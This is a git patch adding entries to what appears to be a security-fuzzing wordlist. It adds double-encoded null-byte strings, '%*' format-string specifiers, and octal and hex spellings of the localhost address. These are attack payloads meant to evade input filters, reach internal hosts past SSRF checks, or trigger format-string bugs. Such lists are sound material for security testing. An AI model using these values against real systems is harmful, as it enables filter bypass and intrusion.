From e682447cb5a0a4362a5860cf7de81653f3a7ad9a Mon Sep 17 00:00:00 2001 From: Jordan Brown Date: Tue, 7 Mar 2017 11:54:22 +1100 Subject: [PATCH] added Null representations for double encoding, format string %* and octal representations of localhost --- .gitignore | 1 + attack/control-chars/NullByteRepresentations.txt | 8 ++++++++ attack/format-strings/format-strings.txt | 11 +++++++++++ attack/ip/localhost.txt | 9 +++++++++ 4 files changed, 29 insertions(+) create mode 100644 .gitignore diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..5509140 --- /dev/null +++ b/.gitignore @@ -0,0 +1 @@ +*.DS_Store diff --git a/attack/control-chars/NullByteRepresentations.txt b/attack/control-chars/NullByteRepresentations.txt index 7ee96c2..3b936f0 100644 --- a/attack/control-chars/NullByteRepresentations.txt +++ b/attack/control-chars/NullByteRepresentations.txt @@ -54,3 +54,11 @@ u"\u0000" %FE%80%80%80%80%80%80 � +%2500 +%252500 +%25252500 +%25%30%30 +\x%30%30 +%%30%30 +%25%2530%2530 + diff --git a/attack/format-strings/format-strings.txt b/attack/format-strings/format-strings.txt index 40df67c..bdbe106 100644 --- a/attack/format-strings/format-strings.txt +++ b/attack/format-strings/format-strings.txt @@ -55,3 +55,14 @@ ppppp%x ppppp%n %@ %@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@ +%* +%*p +%*x +%*s +%*S +%*$* +%*$*p +%*$*x +%*$*s +%*$*S + diff --git a/attack/ip/localhost.txt b/attack/ip/localhost.txt index d22759e..ed5b09e 100644 --- a/attack/ip/localhost.txt +++ b/attack/ip/localhost.txt @@ -11,3 +11,12 @@ 7F000001 7F000002 localhost +0177.1 +0177.2 +0177.0.1 +0177.0.2 +017700000001 +017700000002 +0x7F000001 +0x7F000002 +0X07f.0.0.1